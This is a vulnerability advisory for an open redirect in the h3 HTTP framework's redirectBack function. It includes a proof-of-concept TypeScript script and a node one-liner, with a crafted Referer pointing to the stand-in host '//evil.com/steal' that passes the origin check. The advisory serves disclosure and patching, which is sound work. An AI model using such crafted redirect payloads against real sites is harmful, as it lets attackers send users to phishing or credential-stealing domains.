Open Redirect Affecting h3 package, versions >=2.0.1-rc.17 <2.0.1-rc.18

h3 is a Minimal H(TTP) framework built for high performance and portability.

Affected versions of this package are vulnerable to Open Redirect via the redirectBack function. An attacker can cause users to be redirected to an external, attacker-controlled domain by crafting a URL with a protocol-relative path that passes origin validation but results in a browser redirect outside the intended domain.

# 1. Create a minimal h3 app with redirectBack
cat > /tmp/h3-redirect-poc.ts << 'SCRIPT'
import { H3, redirectBack } from "h3";

const app = new H3();
app.post("/submit", (event) => redirectBack(event));

const res = await app.fetch(new Request("http://localhost/submit", {
  method: "POST",
  headers: { referer: "http://localhost//evil.com/steal" }
}));

console.log("Status:", res.status);
console.log("Location:", res.headers.get("location"));
// Expected: a same-origin path
// Actual: "//evil.com/steal" — protocol-relative redirect to evil.com
SCRIPT

# 2. Verify URL parsing behavior
node -e "
const u = new URL('http://localhost//evil.com/steal');
console.log('origin:', u.origin);         // http://localhost
console.log('pathname:', u.pathname);     // //evil.com/steal
console.log('origin matches localhost:', u.origin === 'http://localhost');  // true
"
# Output:
# origin: http://localhost
# pathname: //evil.com/steal
# origin matches localhost: true

• GitHub Commit
• GitHub Release
• Maintainer's Advisory